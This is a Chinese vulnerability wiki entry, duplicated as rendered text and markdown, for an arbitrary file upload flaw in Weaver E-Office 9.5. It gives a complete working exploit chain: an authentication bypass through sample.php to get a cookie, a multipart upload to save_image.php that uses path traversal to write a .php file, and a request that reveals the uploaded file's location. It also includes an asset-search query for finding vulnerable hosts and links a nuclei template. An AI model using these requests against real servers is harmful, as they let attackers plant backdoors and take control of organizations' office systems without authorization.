fofamini-wiki

登录白背景

源码

泛微E-Office save_image任意文件上传漏洞

一、漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

获取有效cookie

GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

利用上一步获取到的cookie上传文件

POST /general/system/interface/theme_set/save_image.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymzrNfz1ehkVc9A3Z
Cookie: {cookie}
 
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="image_type"
 
../../clientTools
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
 
123
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="theme_name"
 
theme3
------WebKitFormBoundarymzrNfz1ehkVc9A3Z--

通过获取到的cookie，获取上传文件位置

GET /general/down.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip

/clientTools/1911928938.php

nuclei脚本
泛微-eoffice-sample-save-image-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/arycss084huaeet0

# 泛微E-Office save_image任意文件上传漏洞

# 一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

# 二、影响版本

- 泛微 E-Office 9.5

# 三、资产测绘

- hunter`app.name="泛微 e-office OA"`
- 特征

![image.png](./img/5w1cmqi2AAZZKfYX/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-259166.png)

# 四、漏洞复现

1. 获取有效cookie
```
GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```
![image.png](./img/5w1cmqi2AAZZKfYX/1702437960668-5128c282-085e-4f2f-b966-8ef776edee52-454989.png)

2. 利用上一步获取到的cookie上传文件
```
POST /general/system/interface/theme_set/save_image.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymzrNfz1ehkVc9A3Z
Cookie: {cookie}
 
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="image_type"
 
../../clientTools
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
 
123
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="theme_name"
 
theme3
------WebKitFormBoundarymzrNfz1ehkVc9A3Z--
```
![image.png](./img/5w1cmqi2AAZZKfYX/1702438497023-8d1e57de-bd80-4aaa-8e4a-c1411e98b5a3-977505.png)

3. 通过获取到的cookie，获取上传文件位置
```
GET /general/down.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip
```
![image.png](./img/5w1cmqi2AAZZKfYX/1702438550568-c1f91372-c025-403d-9311-74da9bc35378-038305.png)
```
/clientTools/1911928938.php
```
![image.png](./img/5w1cmqi2AAZZKfYX/1702438572270-17ad434a-f38c-4427-9c03-5ca6e1d38ca1-186752.png)
nuclei脚本
[泛微-eoffice-sample-save-image-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219614060-81aa8833-4615-4d0f-ba98-3d5e9a321e6d.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219614060-81aa8833-4615-4d0f-ba98-3d5e9a321e6d.yaml%22%2C%22name%22%3A%22%E6%B3%9B%E5%BE%AE-eoffice-sample-save-image-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.yaml%22%2C%22size%22%3A2283%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22uee209e45-4224-43b3-aee9-2e82d60e98e%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22ucc4b5185%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/arycss084huaeet0>